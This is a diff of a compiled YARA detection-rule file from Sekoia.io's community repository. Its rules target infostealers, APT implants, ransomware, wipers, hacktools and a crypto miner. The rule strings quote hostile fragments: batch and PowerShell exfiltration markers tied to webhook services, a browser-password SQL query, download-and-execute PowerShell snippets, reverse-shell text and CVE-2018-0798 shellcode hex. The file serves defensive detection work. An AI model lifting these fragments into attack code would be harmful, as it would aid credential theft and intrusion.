 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252770,24 +252757,30 @@ rule SEKOIA_Webshell_Icesword_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "&fsAction=rename&newName="
-		$ = "&fsAction=copyto&dstPath="
+		$bat1 = "@echo off"
+		$bat2 = "chcp 65001"
+		$ps1 = "WebClient"
+		$ps2 = "UploadString"
+		$dom1 = "mockbin.org"
+		$dom2 = "webhook.site"
+		$dom3 = "mocky.io"
+		$dom4 = "pipedream.com"
 
 	condition:
-		2 of them and filesize < 100KB
+		(1 of ( $bat* ) or 1 of ( $ps* ) ) and 1 of ( $dom* ) and filesize < 2000
 }
-rule SEKOIA_Apt_Coathanger_Files : FILE
+rule SEKOIA_Infostealer_Win_Doenerium_Str : FILE
 {
 	meta:
-		description = "Detects COATHANGER files"
+		description = "Detect the Doenerium infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "615f5ac1-14bc-4f5b-a02e-7b13cd179917"
-		date = "2024-02-07"
+		id = "1645a86f-1063-4e98-a1fa-85fc8c4e9691"
+		date = "2022-09-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_coathanger_files.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_doenerium_str.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5406d8a99e16f08f1ffca548ea1dd1e27e7707506e796e0fc263bcdbb681632d"
+		logic_hash = "9bc28d89ad2654c33f2ecd9736f5fb3a10dfc68dfef44ece6e628f5bb8db0800"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252795,61 +252788,69 @@ rule SEKOIA_Apt_Coathanger_Files : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/data2/"
-		$ = "/httpsd"
-		$ = "/preload.so"
-		$ = "/authd"
-		$ = "/tmp/packfile"
-		$ = "/smartctl"
-		$ = "/etc/ld.so.preload"
-		$ = "/newcli"
-		$ = "/bin/busybox"
+		$str01 = "doenerium" ascii
+		$str02 = "<================[   User Info   ]>================>" ascii
+		$str03 = "<================[WiFi connections]>================>" ascii
+		$str04 = "<================[Executable Info]>================>" ascii
+		$str05 = "<================[ Network Data ]>================>" ascii
+		$str06 = "\\Network Data.txt" ascii
+		$str07 = "\\Update.exe\" --processStart" ascii
+		$str09 = "\\WiFi Connections.txt" ascii
+		$str10 = "\\User Info.txt" ascii
+		$str11 = "\\Executable Info.txt" ascii
+		$str12 = "\\Found Wallets.txt" ascii
+		$str13 = "SELECT origin_url, username_value, password_value FROM logins" ascii
+		$str14 = "https://cdn.discordapp.com/embed/avatars/0.png" ascii
+		$str15 = "detectClipboard" ascii
+		$str16 = ".gofile.io/uploadFile" ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f or uint32( 4 ) == 0x464c457f ) and filesize < 5MB and 4 of them
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Hacktool_Lazagne_Strings : FILE
+rule SEKOIA_Apt_Uac0099_Lonepage : FILE
 {
 	meta:
-		description = "Detects LaZagne hacktool based on strings"
+		description = "Detects LonePage vbs malware"
 		author = "Sekoia.io"
-		id = "5a5e7a07-1252-48cc-ada5-46e796c4e00e"
-		date = "2022-02-07"
+		id = "007f62f5-da5c-4df7-8b5c-5ed815ce6993"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_lazagne_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uac0099_lonepage.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a6db351fee9a28b1a6d82c2ce063088a1050ee8379cc13ca3cf8cc2038043951"
+		logic_hash = "479f438acb63c76e09722640b973e76d1f1924bf24db477ca6898d123091d5f8"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$w1 = "lazagne.softwares"
-		$w2 = "pypykatz.lsadecryptor"
-		$l0 = "PyModule_GetDict"
-		$l1 = "softwares.sysadmin.filezilla"
-		$l2 = "softwares.walle"
-		$l3 = "softwares.databases.sqldeveloper"
-		$l4 = "softwares.wifi.wpa_supplicant"
+		$s0 = "dim r, c" ascii fullword
+		$s1 = "= createobject(\"WScript.Shell\")" ascii fullword
+		$s2 = "r.Run c, 0, false" ascii fullword
+		$t1 = "GetHostAddresses" ascii fullword nocase
+		$t2 = "upgrade.txt" ascii fullword nocase
+		$t3 = "net.webclient" ascii fullword nocase
+		$t4 = "downloaddata" ascii fullword nocase
+		$t5 = "[System.Environment]::NewLine" ascii fullword nocase
+		$t6 = ".uploaddata('" ascii nocase
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 and all of ( $l* ) ) or ( uint16be( 0 ) == 0x4d5a and all of ( $w* ) ) and filesize < 40MB
+		true and filesize < 10KB and ( ( $s1 at 0x10 and $s0 at 0 and $s2 and 2 of ( $t* ) ) or ( all of ( $t* ) and any of ( $s* ) ) )
 }
-rule SEKOIA_Infostealer_Win_Nosu : FILE
+rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_2 : FILE
 {
 	meta:
-		description = "Finds Nosu samples based on characteristic strings"
+		description = "Matches the Gamaredon Stealer obfuscation"
 		author = "Sekoia.io"
-		id = "9823af25-e30b-4514-a59c-02dd19fe368d"
-		date = "2022-12-15"
+		id = "fd278a90-537b-4c67-9421-01c9f2416b60"
+		date = "2022-02-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_nosu.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_stealer_obfuscation_2.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f18db2008aa9175fc423133fd6d5872c5750d011aad73c373505347443d5032c"
+		logic_hash = "6ffd8504ba8ca614d3941bd46b944d85e0ad4b9d8d2960d508f50550497d2852"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252857,58 +252858,58 @@ rule SEKOIA_Infostealer_Win_Nosu : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "C:\\xampp\\htdocs\\nosu\\core\\release\\lilly.pdb" ascii
-		$str1 = "{\"gp\":\"%s\",\"app\":\"%S\"," ascii
-		$str2 = "stored in zip:\\%s" wide
+		$s1 = { 3d 20 6e 65 77 20 73 74 72 69 6e 67 5b 5d 20 7b 20 [50-200] 20 7d 3b }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and filesize > 100MB and #s1 > 40
 }
-rule SEKOIA_Apt_Malware_Pocoproxy : FILE
+
+rule SEKOIA_Loader_Win_Revil_Loader
 {
 	meta:
-		description = "Detects strings in PocoProxy"
+		description = "Detect the REvil loader using DDL side loading. The detected ressource is a legitimate executable used to load the malicious .dll containing the ransomware"
 		author = "Sekoia.io"
-		id = "8b37e37f-339e-4f8b-b792-435096f56af0"
-		date = "2024-08-13"
+		id = "3c293e87-e2d7-475a-9536-8b991961fa11"
+		date = "2021-07-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_malware_pocoproxy.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_revil_loader.yar#L4-L34"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2b89f15012512002c656ff821bbbeca0"
-		hash = "8d850fed6bb1f3b60365ed656c6791c5"
-		logic_hash = "217f4eabb5ff4534878b6dd192ae446e651d8510f03ceb501eb33e91199c15a8"
+		logic_hash = "15680c5e5d801d65e581869ad88d89863c8a51e3f94a3d2f37c02c5fd14df07f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
+		hash2 = "50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03"
+		hash3 = "66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8"
+		hash4 = "81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471"
+		hash5 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
+		hash6 = "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e"
+		hash7 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
+		hash8 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
 
 	strings:
-		$ = "-listen" ascii fullword
-		$ = "-connect" ascii fullword
-		$ = "-proxy" ascii fullword
-		$ = "%d-%d-%d %d:%d:%d" ascii fullword
-		$ = "%S://%S:%u%S" wide
-		$ = "\\r\\n[%u(%u/%u/%u/%u)]==> %S  %S>> %S:%d connect ok." wide
-		$ = "\\r\\nnconnect to %S:%d faild." wide
-		$ = "\\r\\nI'm listen %S:%d,welcome..." wide
+		$crypto = ".\\crypto\\" ascii
+		$dropped_name1 = "MsMpEng.exe" wide
+		$dropped_name2 = "mpsvc.dll" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		all of ( $dropped_name* ) and #crypto > 100 and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a" )
 }
-rule SEKOIA_Apt_Kimsuky_Malicious_Vba : FILE
+rule SEKOIA_Hacktool_Stowaway_Strings : FILE
 {
 	meta:
-		description = "Detects malicious VBA used by Kimsuky"
+		description = "Detects Stowaway based on strings"
 		author = "Sekoia.io"
-		id = "2dbe2431-3592-4395-8164-49abae4a5a3d"
-		date = "2022-08-30"
+		id = "a952b45a-269b-4075-bf72-16d6d863e97c"
+		date = "2023-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_malicious_vba.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_stowaway_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "68d7b757f660907fcea3ea03c4027b429f8acdef6569d63cdb744e9d77637080"
+		logic_hash = "10d28637e47d43497923a192c9e3a8bb35b480a314c71132866bdf0e49c2c460"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252916,24 +252917,32 @@ rule SEKOIA_Apt_Kimsuky_Malicious_Vba : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Certutil -decode %TMP%"
-		$ = "%LOCALAPPDATA%\\Microsoft\\Office"
+		$ = "agent.CloseLowConn"
+		$ = "agent.CloseListener"
+		$ = "agent.SimpleNodeInit"
+		$ = "agent.HandleConnToLowerNode"
+		$ = "agent.HandleConnFromLowerNode"
+		$ = "common.NewPassToLowerNodeData"
+		$ = "agent.HandleSimpleNodeConn"
+		$ = "agent.HandleConnToUpperNode"
+		$ = "agent.HandleConnFromUpperNode"
+		$ = "agent.StartSocks"
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and filesize < 1MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
 }
-rule SEKOIA_Apt_Granitetyphoon_Pingpulllinux_Strings : FILE
+rule SEKOIA_Spyware_And_Strongpity_Mobile_Backdoor : FILE
 {
 	meta:
-		description = "Detects PingPull Linux variant"
+		description = "Detect the mobile backdoor using the name used in the certificate"
 		author = "Sekoia.io"
-		id = "ee213206-d9ad-47fa-bea1-61a9d2cfba58"
-		date = "2023-05-25"
+		id = "58ceb85b-d94f-47b2-86e4-59bd41f4fea8"
+		date = "2023-01-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_granitetyphoon_pingpulllinux_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/spyware_and_strongpity_mobile_backdoor.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "89c89bb24d1996c04fba0e6ebfd2aaf1544d8a9e6333b896c1855747fb979308"
+		logic_hash = "9005fe938433223f32642f6bbf7c4c58f0b927a006e283c8b12f79103ec02cfc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -252941,200 +252950,181 @@ rule SEKOIA_Apt_Granitetyphoon_Pingpulllinux_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "chkconfig --add %s"
-		$ = "chkconfig %s on"
-		$ = "update-rc.d %s enable"
-		$ = "service %s start"
-		$ = "respawn limit 10 10"
-		$ = "POST /%s HTTP/1.1"
-		$ = "PROJECT_%s_%s_%08X"
-		$ = "Description=The HTTP(S) Client"
-		$ = "exec %s -f"
+		$s1 = "Elizabeth Mckinsen0"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 11MB and 7 of them
+		all of them and filesize > 2MB
 }
-
-rule SEKOIA_Wiper_Win_Isaacwiper
+rule SEKOIA_Crime_Sload_Vbs_Downloader_Strings_2 : FILE
 {
 	meta:
-		description = "Detect the IsaacWiper using multiple methods + ReversingLab rule's condition"
+		description = "Detects an sLoad downloader based on strings"
 		author = "Sekoia.io"
-		id = "b081e3a3-612e-46ae-93af-82e7ee98fcf7"
-		date = "2022-03-15"
+		id = "77ff0d21-9249-43b2-9a6d-87988a2dec3b"
+		date = "2022-08-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_isaacwiper.yar#L4-L45"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_vbs_downloader_strings_2.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0338e11ece112b6f7d88db49cfc703a4431d7ee54f4b9ff0b9e2ea50d39cab4f"
+		logic_hash = "06e4fcb6c48078c6c44d779820fc901b0f335b9495097ed28206826a959d0712"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "getting drives..." wide
-		$s2 = "physical drives:" wide
-		$s3 = "-- system physical drive" wide
-		$s4 = "-- physical drive" wide
-		$s5 = "logical drives:" wide
-		$s6 = "-- system logical drive:" wide
-		$s7 = "-- logical drive:" wide
-		$s8 = "start erasing physical drives..." wide
-		$s9 = "-- FAILED" wide
-		$s10 = "-- start erasing logical drive" wide
-		$s11 = "start erasing system physical drive..." wide
-		$s12 = "system physical drive -- FAILED" wide
-		$s13 = "start erasing system logical drive" wide
+		$ = "On Error Resume Next"
+		$ = {0A [4] 3D 41 72 72 61 79}
+		$ = { 2E 50 61 74 74 65 72 6E 20 3D 20 22 28 [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C }
 
 	condition:
-		pe.imphash( ) == "a4b162717c197e11b76a4d9bc58ea25d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "06d63fddf89fae3948764028712c36d6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "48f101db632bb445c21a10fd5501e343" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5efc98798d0979e69e2a667fc20e3f24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9676f7c827fb9388358aaba3e4bd0cc6" ) or hash.md5 ( pe.rich_signature.clear_data ) == "ec862d3013903478c2ff8dce2792815f" or all of ( $s* )
+		all of them and filesize < 20KB
 }
-rule SEKOIA_Exploit_Win_Cloudatlas_Cve_2018_0798 : CVE_2018_0798 FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Screenshot_Module : FILE
 {
 	meta:
-		description = "Detect RTF files used by CloudAtlas to exploit CVE-2018-0798"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "fcff4bc7-fe88-4546-bb5b-f2a1c2f8b0a5"
-		date = "2022-11-15"
+		id = "d1ef0bd1-37dc-405f-b82b-288b1798455c"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_win_cloudatlas_cve_2018_0798.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_screenshot_module.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1ed1009d77835f60834c20e61158b00ce7416ade8aa86c3314f4d8d1f6742fa0"
+		logic_hash = "caab57534a00620974f7d49c7b38a3f191aca596b69b3e4c499e3099023c2f9c"
 		score = 75
 		quality = 80
-		tags = "CVE-2018-0798, FILE"
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c2064c7f4826c46bc609c472597366fd"
-		hash2 = "e2281402c63d4b544b81678250d24e61"
-		hash3 = "a97fa135d7e42886bcfdacca0d96c047"
 
 	strings:
-		$ = "6060606061616161616161616161616161616161" ascii nocase
-		$ = "FB0B00004bE8FFFFFFFFC35F83C71B33C966B908" ascii nocase
-		$ = "010f0d00ddd8d97424f4668137" ascii nocase
+		$ = "%s_%02d.%02d.%04d_%02d.%02d.%02d.%03d.%s" wide
+		$ = "Screenshot" wide
+		$ = "\\\\.\\pipe\\PipeDtMd" wide
 
 	condition:
-		uint32be( 0 ) == 0x7b5c7274 and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Ta410_Flowcloud_Loader : FILE
+
+rule SEKOIA_Downloader_Win_Fake_Tor_Browser
 {
 	meta:
-		description = "Detects FlowCloud Loader"
+		description = "Detect fake TOR browser used to spy Chinese TOR users"
 		author = "Sekoia.io"
-		id = "0a11dfa0-5a59-477b-baf6-6a777d020860"
-		date = "2024-05-27"
+		id = "6b070ba6-490b-43c2-9a01-65812d829eeb"
+		date = "2022-10-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ta410_flowcloud_loader.yar#L1-L23"
+		reference = "https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_fake_tor_browser.yar#L4-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "450cfdfbd9a42b623fc1acb55f3ea309ae54282b480edcb9495f4d45874d3922"
+		logic_hash = "5fe60673e54a6904f4fd068b04b950b895b18e7766d2e7343eae2b1bba9591f9"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$decryption_function = {8A C8 80 C1 26 32 D1 30 14 38}
-		$derivation_key = {6B 04 00 00 F7 ?? 81 c2 a8 01 00 00}
-		$new_pattern_1 = {50 33 c0 58 74 01 e8}
-		$new_pattern_2 = {89 44 24 fc 58 8D 64
-        24 fc 81 fc 00 10 00
-        00 77 06 81 c4 ?? ??
-        ?? ?? 8B 44 24 FC}
-		$patch_bytes = {68 78 56 34 12 C3 90 90 90 90 90 00}
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 2 of them
+		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7172f95f934574be95c0250fb42b8f51" )
 }
-rule SEKOIA_Apt_Apt28_Powershell_Ntlm_Stealer : FILE
+rule SEKOIA_Ransomware_Win_Chaos : FILE
 {
 	meta:
-		description = "Detects the NTLM Stealer used by APT28 against UA energy sector"
+		description = "Detects the Chaos Ransomware"
 		author = "Sekoia.io"
-		id = "3fb5c472-6b1c-490e-b38f-4d4f1c472f43"
-		date = "2023-09-07"
+		id = "c1876a18-0618-44e2-8919-b4a041de97e7"
+		date = "2022-01-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_powershell_ntlm_stealer.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_chaos.yar#L1-L46"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "29d039bf7d7018ebbae187ae0f057161c3f9256076324f06167872adc0accfa7"
+		logic_hash = "1947e6de8f74fe7bc52107d4a57e19eacf022121f5decee54a8c90797be844c6"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "'NTLM ' = [Convert]::ToBase64String"
-		$ = ".Prefixes.Add('http://localhost:8080/')"
-		$ = ".AddHeader('WWW-Authenticate', 'NTLM')"
-		$ = "GetValues('Authorization');"
-		$ = "[0] -split '\\s+';"
+		$rep00 = "\\Desktop" wide
+		$rep01 = "\\Links" wide
+		$rep02 = "\\Contacts" wide
+		$rep03 = "\\Documents" wide
+		$rep04 = "\\Downloads" wide
+		$rep05 = "\\Pictures" wide
+		$rep06 = "\\Music" wide
+		$rep07 = "\\OneDrive" wide
+		$rep08 = "\\Saved Games" wide
+		$rep09 = "\\Favorites" wide
+		$rep10 = "\\Searches" wide
+		$rep11 = "\\Videos" wide
+		$rep12 = "C:\\Users\\" wide
+		$str0 = "svchost.exe" wide
+		$str1 = "\\privateKey.chaos" wide
+		$str2 = "Chaos Ransomware" wide
+		$str3 = "read_it.txt" wide
+		$str4 = "<EncryptedKey>" wide
+		$str5 = "passwordBytes" ascii
+		$str6 = "lookForDirectories" ascii
+		$str7 = "Rfc2898DeriveBytes" ascii
+		$str8 = "ICryptoTransform" ascii
+		$str9 = "FromBase64String" ascii
+		$ext0 = ".torrent" wide
+		$ext1 = ".ibank" wide
+		$ext2 = ".wallet" wide
+		$ext3 = ".swift" wide
+		$ext4 = ".onetoc2" wide
 
 	condition:
-		3 of them and filesize < 4000
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and filesize < 2MB and 6 of ( $str* ) and 10 of ( $rep* ) and 4 of ( $ext* )
 }
-rule SEKOIA_Miner_Lin_Xmrig_Strings : FILE
+rule SEKOIA_Apt_Polonium_Powershell_Creepydrive_Strings
 {
 	meta:
-		description = "Detects XMRig ELF"
+		description = "Detects POLONIUM CreepyDrive Powershell implant"
 		author = "Sekoia.io"
-		id = "2f99020b-424c-4433-860c-5e9ab4e1f1de"
-		date = "2022-09-08"
+		id = "0ba196bd-9cd6-4553-b7bf-69989cdb8be4"
+		date = "2022-06-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/miner_lin_xmrig_strings.yar#L1-L36"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_powershell_creepydrive_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4946e5099d7d342c8cf6644146ffec8506e786a1d4de0b05ef039bcf2b0fdad2"
+		logic_hash = "28b8f10a36d13e97e606b082f20c50c3d48241409e7f1aca621e2af9d756dbe5"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
-		modification_date = "2024-01-04"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "XMRig "
-		$ = "pool_wallet"
-		$ = "IP Address currently banned"
-		$ = "rigid"
-		$ = "diff_current"
-		$ = "shares_good"
-		$ = "shares_total"
-		$ = "avg_time"
-		$ = "avg_time_ms"
-		$ = "hashes_total"
-		$ = "pool address"
-		$ = "ping time"
-		$ = "connection time"
-		$ = "daemon+wss://"
-		$ = "daemon+https://"
-		$ = "daemon+http://"
-		$ = "socks5://"
-		$ = "stratum+ssl://"
-		$ = "stratum+tcp://"
+		$ = "function Exec($comm)" base64 ascii wide
+		$ = "$comm = $comm + \"| outstring" base64 ascii wide
+		$ = "Invoke-Expression -Command:$comm" base64 ascii wide
+		$ = "microsoft.com" base64 ascii wide
+		$ = "$req = Invoke-WebRequest" base64 ascii wide
+		$ = "$j += $data" base64 ascii wide
+		$ = "$res = Exec($arr[$i])" base64 ascii wide
+		$ = "$arr = @(iex \"$req\")" base64 ascii wide
+		$ = "elseif ($req -cmatch" base64 ascii wide
+		$ = "graph.microsoft.com" base64 ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 10MB and 7 of them
+		3 of them
 }
-rule SEKOIA_Apt_Cerana_Keeper_Yk0130 : FILE
+rule SEKOIA_Apt_Unknown_Sessionmanageriis_Strings : FILE
 {
 	meta:
-		description = "Detects YK0130 reverse shell"
+		description = "Detects the IIS SessionManager backdoor"
 		author = "Sekoia.io"
-		id = "3da898a9-68e7-472f-8478-a0243840ec0a"
-		date = "2024-10-04"
+		id = "7d55dd82-509f-444d-a1ba-6417b51f392f"
+		date = "2022-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cerana_keeper_yk0130.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unknown_sessionmanageriis_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2554e4864294dc96a5b4548dd42c7189"
-		logic_hash = "4462c6b7f46520207f49275292a3be873540becb593176d771d3489fba6f4cb0"
+		logic_hash = "b1058b07c8e40431f8f3841b5ad49b4d6ead21a91d014f24c083f37eeacc5ac5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -253142,62 +253132,57 @@ rule SEKOIA_Apt_Cerana_Keeper_Yk0130 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pdb = "C:\\Users\\admin\\source\\repos\\YK0130" ascii fullword
+		$ = "Wokring OK"
+		$ = "Delete File Success :"
+		$ = "Delete File Error :"
+		$ = "SM_SESSION="
+		$ = "SM_SESSIONID"
+		$ = "attachment; filename ="
+		$ = "CHttpModule::"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 300KB
+		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 400KB and 4 of them
 }
-rule SEKOIA_Tool_Gost_Tunnel_Strings : FILE
+rule SEKOIA_Apt_Apt41_Powershell_Collection_Script : FILE
 {
 	meta:
-		description = "Detects GOST Go Tunnel, based on strings"
+		description = "Detects PowerShell collection script"
